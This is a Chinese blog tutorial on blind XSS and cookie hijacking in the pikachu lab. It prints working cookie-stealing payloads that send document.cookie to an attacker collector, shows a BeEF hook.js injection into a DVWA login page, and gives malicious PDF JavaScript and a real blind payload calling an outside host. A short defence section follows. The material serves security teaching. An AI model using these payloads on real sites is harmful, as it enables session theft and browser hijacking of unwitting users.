XSS盲打与cookie劫持

最新推荐文章于 2025-06-02 15:27:06 发布
原创 最新推荐文章于 2025-06-02 15:27:06 发布 · 1.4k 阅读 · 22 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #网络安全 #web安全 #安全 #xss

目录

【学习目标、重难点知识】

【学习目标】

【重难点知识】

XSS盲打(加载远程攻击payload)

XSS偷cookie

cookie收集

在线XSS收集平台的使用

1. BeeF框架的使用

BeeF简介

安装和使用

XSS 一些实战应用

1. XSS PDF

2. 公网投毒

3. 网站挂马

XSS防御

HttpOnly

输入检查

输出检查

【学习目标、重难点知识】

【学习目标】

  1. XSS盲打
  1. XSS收集平台
  1. BeFF框架的使用
  1. 在线XSS收集平台的使用

【重难点知识】

  1. XSS收集平台的使用
  1. 在线XSS收集平台的使用

XSS盲打(加载远程攻击payload)

盲打的意思就是指:在看不见XSS内容提交后的输出的情况下,强制把xss脚本提交上去。此种情况多出现在留言板,问题反馈等可以在后台查看的情况下,当我们的管理员或客服打开网页的时候,就此中招。

以pikachu的xss盲打为例子,在留言的时候,如留下的是XSS的代码,这些代码窃取了会话session,而后台如果没有对这些xss代码进行过滤,问题就此产生。

XSS后台很多,也很好用,包括xssme pkxss 等等。我们可以在pikachu靶场里看到有xss的集成平台。

XSS偷cookie

前期准备

利用过程

    • cookie.php,需要get将cookie内容传过来
  • 如何让受害者去访问?
  • 让受害者执行我们的JS代码
  • 如何让受害者执行?
  • 找xss漏洞,将代码插入到目标网站

<script>document.location='http://pkxss/xcookie/cookie.php?cookie=cookie'%2bdocument.cookie</script>			//注意,符号+,要改成%2b

  • 受害者执行完之后,会重定向到我们设置的安全网站

  • 这个时候受害者执行js代码之后,就会将cookie,发送到目标服务器上,目标服务器用cookie.php接收cookie信息

  • 注意,cookie.php中重定向网站要自己修改,改成目标自己的站点

cookie收集

重定向到另一个可信网址 让点击者 不知情。

注意这个地方这个cookie.php的文件位置,我们要访问这个收集cookie的文件路径应该是:

http://主机地址/pkxss/xcookie/cookie.php

我们可以构建一个偷cookie的payload:

<script> document.location = 'http://主机地址/pkxss/xcookie/cookie.php?cookie='+document.cookie; </script>

接下来在反射性XSS中试一试:

获得的结果:

可以get反射型XSS构建一个欺骗用户点击的链接:

http://localhost:8089/vul/xss/xss_reflected_get.php?message=<img src=x onerror="document.location = 'http://主机地址/pkxss/xcookie/cookie.php?cookie='+document.cookie;">&submit=submit

注意:+会被过滤 , 用%2B来替换

http://localhost:8089/vul/xss/xss_reflected_get.php?message=<img src=x onerror="document.location = 'http://主机地址/pkxss/xcookie/cookie.php?cookie='%2Bdocument.cookie;">&submit=submit

访问之后:

在线XSS收集平台的使用

1. BeeF框架的使用

BeeF简介

BeeF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。 用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击和利用。

BeeF主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段时间(默认为1秒)就会向BeEF服务器发送一个请求,询问是否有新的代码需要执行。BeEF服务器本质上 就像一个Web应用,被分为前端和后端。前端会轮询后端是否有新的数据需要更新,同时前端也可以向后端发送指示, BeeF持有者可以通过浏览器来 登录 BeEF 的后端,来控制前端(用户的浏览器)。BeEF一般和XSS漏洞结合使用。

安装和使用
安装教程:https://www.cnblogs.com/xfbk/p/17936987

我们主要在docker中去使用,安装完docker并启动后,我们搜索BeeF框架的镜像:

然后拉取下来:

然后直接启动docker:

docker run -d --name beef -p 3000:3000 janes/beef

现在,我们通过浏览器打开BeEF的界面:

http://xxx.xxx.xxx.xxx:3000/ui/authentication 默认账号密码:beef/beef

此时,我们已经进入了BeEF页面里面,但是发现什么都没有。 最后我们要设置一个钩子,将下面这段代码保存为beef.html:

<html> 
  <head>    
    <title>BeEF测试</title> 
  </head> 
  <body>    
    <script src="http://192.168.119.129:3000/hook.js"></script>

  </body> 
</html>

这是一个最简单的例子,<script>标签的src属性指向的是BeEF的钩子,其中里面的地址大家根据自己实际情况更改。也可以直 接将这个路径贴到浏览器中,看看这个JS代码。

接下来访问这个文件,就可以看到主机上线:

这就类似一个远控木马,别人点击了你的链接就能操控他的浏览器了,还能执行很多命令,命令菜单不多,大家都点点看看吧。

XSS 一些实战应用

1. XSS PDF

  • 首先我们需要制作一个恶意的 pdf 文件,大多有三种方式:
    • 迅捷 PDF 编辑器(推荐)
    • Adobe Acrobat DC
    • Python 脚本嵌入

  • 然后选中缩略图,点击属性,此时在右侧可以看到属性栏:

  • 新增运行 JavaScript:

  • 在弹出的 JavaScript 编辑器对话框中输入以下代码,然后保存文件:
app.alert("恶意代码");通过弹出恶意警告框来干扰用户或欺骗用户。

this.exportDataObject({ cName: "恶意文件", nLaunch: 2, cDIPath: "http://恶意网站/恶意文件" });通过导出数据对象来触发恶意文件的下载或执行。

this.submitForm({ cURL: "http://恶意网站/恶意脚本" });通过提交表单来触发恶意脚本的执行。

注:之所以不是 alert('xss'),这是因为Adobe支持自身的 JavaScript 对象模型,利用 JavaScript 进行攻击时只能使用 Adobe 所支持的功能。

  • 现在恶意文件已经制作完成,使用浏览器打开:

  • 但也不是所有浏览器都会弹:
    • Chrome(弹)
    • Edge(弹)
    • QQ(弹)
    • Firefox(不弹)
    • IE(不弹)
  • 同样的 PDF 内的 JS 是被大幅阉割过的,不存在能够获取 cookie 等问题。

2. 公网投毒

  • 在站点中嵌入 xss 代码,每个访问者都将进行回连(供应链攻击)。
  • 公网自建站点(DVWA + BeEF):
docker run -itd -p 81:80 --name dvwa citizenstig/dvwa:latest
  • 在 login.php 处添加代码:
docker exec -it dvwa /bin/bash
echo '<script src="http://10.10.8.21:3000/hook.js"></script>' >> /var/www/html/login.php
  • 查看结果:
root@e7e481b84bad:/# tail -n 1 /var/www/html/login.php
<script src="http://10.10.8.21:3000/hook.js"></script>
  • 当我们访问 DVWA 登录页面时,BeEF 就已经上线了:

3. 网站挂马

  • 对方访问站点后直接造成权限获取,一般都是利用浏览器漏洞(0 day),常用漏洞有:
    • ms14-064(CVE-2014-6332)
    • CVE-2018-8174
    • CVE-2019-1367
    • CVE-2021-21220
    • CVE-2023-4863
  • 参考页面:

CVE-2021-21220(Chrome)漏洞复现 | Yongz丶

XSS防御

HttpOnly

HttpOnly 最早由微软提出,浏览器将禁止页面的JavaScript访问HttpOnly属性的Cookie。HTTPOnly 并未要对抗XSS,HTTPOnly 解决的是XSS后的Cookie劫持攻击。在使用了HTTPOnly之后,会使这种攻击失效。

使用了HttpOnly之后就没有办法偷取cookie了。

response.addHeader("Set-Cookie", "uid=112; Path=/; HttpOnly");


Set-Cookie : uid=112; Path=/; HttpOnly



cookie:

输入检查

常见的web漏洞都要求攻击者构造一些特殊字符,这些特殊字符可能是常规用户不会用到的,所以输入检查就很有必要了。在XSS防御上一般就是检查用户输入数据中是否包含一些特殊字符,如<、>、"、' 如果发现这些特殊字符将这些关键字符过滤或者编码。

比较智能的检查还可以匹配XSS 的特征,比如查找用户数据中是否包含了

输出检查

除了富文本的输出之外,在变量输出到HTML页面时,可以使用编码或者转义的方式来防御XSS攻击。

  • HTML代码的编码方式是HtmlEncode。
  • PHP中有htmlentities()和htmlspecialchares() 这两个函数可以满足安全要求
  • Javascript 可以使用JavascriptEncode。
  • 在Django自带的模板系统中,可以使用escape进行htmlencode,并且在Django 1.0中默认所有变量都会被escape。
  • web2py中,也默认escape了所有变量。
某次日常xss盲打
召唤大白的博客
03-09 377
今天接到个渗透测试的活,基本上就是静态站,本来也不报啥希望了,扫了一圈整个站就一个留言功能,根据经验一般留言就是在标签里,所以右键查看下元素,确定留言内容确实在里面,随手一个xss盲打未拦截,成功提交留言。 盲打使用的xss平台的默认模块Payload: ccc”</tExtArEa><sCRiPt sRC=https://xss8.cc/CnQ6></sCrIpT><textarea> 快下班时意外收到了弹回来的cookie,并且定位到了该站后台地址如下图,
关于xss盲打关于xss盲打
u012614598的专栏
11-21 1097
关于xss盲打关于xss盲打      又到了各种年终总结的时候了,先祝各位看官“圣诞快乐”。我记得有朋友问我在2012年里有没有“猥琐流”比较出彩的东西时,我给的答案是“xss盲打”!   关于“盲打”这个词语的出现,最早应该是在wooyun里id为“胯下有杀气”的马甲提出的。最早的一个wooyun案列是2012年7月提交的《WooYun-2012-09547》 ,由此xss盲打火了起来,
XSS盲打
weixin_44749329的博客
05-19 4264
XSS盲打 XSS盲打:它不是一种XSS漏洞的类型,它其实是一种XSS一种的攻击场景。 以下来实施XSS的一种盲打 1.打开pikachu里的XSS盲打 2.输入一个字符来测一下看它有什么样的作用,点击提交后显示如图这句话 仿佛在说我们输入的内容并不会在前端输出,看起来好像是被提交到了后台,它的管理员有可能会被看,只有他的管理员能看到我输入的内容,前端的用户是看不到的 3.我们来设想一种...
pikachu靶场通关笔记10 XSS关卡06-XSS盲打
最新发布
mooyuan的网络安全博客
06-02 1163
本系列为通过《pikachu靶场通关笔记》的XSS关卡(共10关)渗透集合,通过对XSS关卡源码的代码审计找到真实原因,讲解XSS的原理并进行渗透实践,本文为XSS第06关-XSS盲打的渗透部分,并且结合源码分析,对比通用的XSS攻击讲解攻击成因。
什么是xss盲打
aletero的专栏
07-11 4167
什么是xss盲打?         盲打只是一种惯称的说法,就是不知道后台不知道有没有xss存在的情况下,不顾一切的输入xss代码在留言啊,feedback啊之类的地方,尽可能多的尝试xss的语句语句的存在方式,就叫盲打。        “xss盲打”是指在攻击者对数据提交后展现的后台未知的情况下,网站采用了攻击者插入了带真实攻击功能的xss攻击代码(通常是使用script标签引入远程的js
XSS-窃取Cookie及拓展
2301_76631050的博客
07-23 2005
步骤一:来到xss平台 点击公共模块---flash弹窗钓⻥-查看将其中的代码保存成⼀个js⽂件放到我们⽹站的根⽬录下⾯。步骤二:用记事本打开1.js 修改js中的这⼀⾏代码,改成我们伪造的flash⽹站⽹址。步骤七:点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"...步骤⼋:配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!步骤二:在我的项目中选择我们刚创建的项目,点击右上角的查看配置代码。把文件复制到我们网站的根目录下。
XSS漏洞】XSS攻击平台-窃取Cookie
muyuchen110的博客
07-23 900
XSS漏洞基础:XSS 攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS) 的缩写混淆,故将跨站脚本攻击缩写为 XSSXSS 是⼀种在 web 应⽤中的计算机安全漏洞,它允许恶意web⽤户将代码植⼊到 web ⽹站⾥⾯,供给其它⽤户访问,当⽤户访问到有恶意代码的⽹⻚就会产⽣ xss 攻击;漏洞概念:⽬标未对⽤户从前端功能点输⼊的数据输出的内容未进⾏处理或者处理不当,从⽽导致恶意的JS代码被执⾏造成窃取⽤户信息劫持WEB⾏为危害的。
XSS-窃取Cookie
2401_85783544的博客
07-23 278
XSS攻击-窃取Cookie
XSS漏洞——渗透day08
qq_62716256的博客
09-04 679
XSS漏洞——渗透day08
35、WEB攻防——通用漏洞&XSS跨站&反射&存储&DOM&盲打&劫持
qq_55202378的博客
01-24 796
DOM型XSS反射型XSS、存储型XSS的最大区别在于:DOM型XSS前端的数据是传输给前端JS代码进行处理,而反射型XSS、存储型XSS是后端PHP代码对前端数据进行处理。存储型(持久型),攻击代码被写入数据库中。常见于:写日志、留言、评论的地方。URL中没有参数接收XSS payload的话,就是不能写。,可以尝试在URL路径后写。mXSS(突变型XSS)UXSS(通用型XSS
8.XSS盲打
愿听风成曲
06-25 461
首先在xss盲打界面输入攻击代码和随意的大名提交即可。管理员界面直接会弹出xss界面。
XSS漏洞---XSS盲打
Ethan024的博客
03-13 358
XSS漏洞(本文仅供技术学习分享) XSS盲打 实验准备: 皮卡丘靶场; 实验步骤: 输入无害字符串来查看效果,发现该字符串已经提交到后台; 输入一个JavaScript脚本 — alert(2222) 发现也并没有弹框 3. 登录管理员界面查看后台,发现登录就会弹框 4. 其本质就是XSS存储型漏洞。 ...
Pikachu靶场:XSS盲打
witwitwiter的博客
04-17 2373
Pikachu靶场:XSS盲打 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 ●xss盲打也是属于存储型XSS类型 盲打的意思是无法直接在前端看到反馈效果。 xss盲打类型交互的数据会被存在在数据库里面,永久性存储,一般出现在留言板,问卷调查等页面。 形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。存储型XSS漏洞跟反射型形成的原因一样,不同的是存储型XSS下攻击者可以
XSS攻击:简单的盲打实验
weixin_43726152的博客
05-13 432
什么是盲打? 就是提交的恶意js给后台,但前端是看不见的,我们就不知道这里是否有漏洞。 比如意见箱: 但是值得试试,因为一旦管理员进入后台查看,就会中招 我们这里重复做获取管理员cookie这个实验,获取了管理员的cookie危害很大,攻击者可以用这个管理员cookie免密登入: 目标主机:win10 192.168.56.133 攻击主机:win10 192.168.56.132 构造payload <script>document.location = 'http://192.168.56
xss盲打以及盲打实验演示
北冥有鱼
04-22 2383
什么是xss盲打? 我们直接来到ipkachu的xss盲打页面进行演示 我们随便输入几个字符 发现我们的输入不会在前端输出,只会在后台输出,只有管理员能看到我们的内容 我们按照之前的思路输入一下payload,当然前端也没有输出 我们点一下提示会发现有登陆后台的地址,那我们就去登陆一下这个后台 登录进去后发现刚才的payload果然被插入进去了 这种情况其实就属于xss盲打,这个漏洞...
XSS跨站脚本攻击之——XSS盲打
温柔小薛的博客
04-05 835
XSS盲打 XSS盲打就是攻击者在前端提交的数据不知道后台是否存在xss漏洞的情况下, 提交恶意JS代码在类似留言板等输入框后,所展现的后台位置的情况下, 网站采用了攻击者插入的恶意代码, 当后台管理员在操作时就会触发插入的恶意代码, 从而达到攻击者的目的。 方法 ‘’‘><script>alert('123')</script>+攻击代码 在文本框提交 ...
web安全学习笔记(八) XSScookie劫持
qycc3391的博客
03-06 1864
上一文中提到XSS的分类,本文将演示如何通过XSS进行cookie劫持,并且伪装登录。 再cookie劫持中,有三种身份,分别是服务器,普通用户以及攻击者。这里使用本机和两台台虚拟机完成这项工作。基本思路如图所示: 首先,攻击者发现某个网站存在XSS漏洞,于是编写恶意代码。当用户访问带有恶意代码的网站时,会将通过恶意代码,将cookie发送给攻击者。当攻击者获取cookie后,便可以使用cook...
xss盲打
03-18
### XSS攻击概述 XSS(Cross-Site Scripting),即跨站脚本攻击,是一种常见的Web安全漏洞。这种攻击允许攻击者通过注入恶意脚本的方式,在受害者的浏览器中执行未经授权的操作[^3]。 #### 存储型XSS 存储型XSS是指攻击者将恶意代码永久存储在目标服务器上,当其他用户访问受影响的页面时,这些恶意代码会被加载并执行。这种方式的特点在于其持久性和广泛的影响范围[^1]。 #### 反射型XSS 反射型XSS通常发生在用户点击一个含有恶意链接的时候,该链接中的恶意脚本会在请求返回给用户的HTML响应中被执行。这类攻击依赖于用户交互行为来传播和生效[^5]。 #### DOM型XSS DOM型XSS不同于前两种类型,因为它完全基于客户端JavaScript操作文档对象模型(DOM),而不涉及向服务器发送任何特殊的数据流。这意味着即使应用本身可能已经采取了一些措施保护HTTP层免受传统形式的XSS侵害,但如果存在不当修改DOM节点的行为,则仍有可能遭受此类攻击。 --- ### XSS盲打及其防护方法 XSS盲打指的是攻击者无法直接看到自己所提交数据的具体呈现效果但仍尝试发起攻击的情形。例如,在某些情况下,攻击者可能会试图窃取管理员账户的信息却不知道自己的输入是否会成功显示出来[^2]。 对于上述提到的各种类型的XSS攻击以及更复杂的场景如盲打情况下的防御策略主要包括以下几个方面: #### 输入验证过滤 确保所有来自外部源的数据都经过严格的校验过程,拒绝不符合预期模式的内容进入系统内部逻辑链路之中。具体做法可以包括但不限于黑名单机制(阻止已知危险字符组合) 和白名单机制 (仅接受预定义的安全字符串集合)。 ```python import re def sanitize_input(user_input): pattern = r'^[a-zA-Z0-9\s]+$' # Example of a simple whitelist regex if not re.match(pattern, user_input): raise ValueError("Invalid input detected.") return user_input ``` #### 输出编码转义 无论何时何地都将动态生成的部分按照相应上下文中所需的标准格式重新表达一遍再输出至前端界面供展示用途即可有效规避大部分常规意义上的XSS风险隐患。 ```html <!-- HTML Entity Encoding --> <script> function escapeHtml(text){ var map={ '&':'&', '<':'<', '>': '>' }; return text.replace(/[&<>]/g,function(m){return map[m];}); } </script> <div id="output"></div> <button onclick="document.getElementById('output').innerHTML=escapeHtml(prompt('Enter something'));">Click Me!</button> ``` #### HTTP头部设置 启用Content Security Policy(CSP),这是一种额外的安全层次结构用来检测并减轻诸如SQL注入(SQLi)及跨站点脚本(XSS)之类的代码注入攻击[^4]。 ```apacheconf Header set Content-Security-Policy "default-src 'self'; script-src 'self' https://trustedscripts.example.com; object-src 'none'" ``` #### 安全意识培训 定期开展针对开发人员和技术支持团队成员关于最新威胁趋势的知识更新课程有助于提高整体安全性水平。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

苏苏渗透大师

请把钱砸我脸上谢谢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值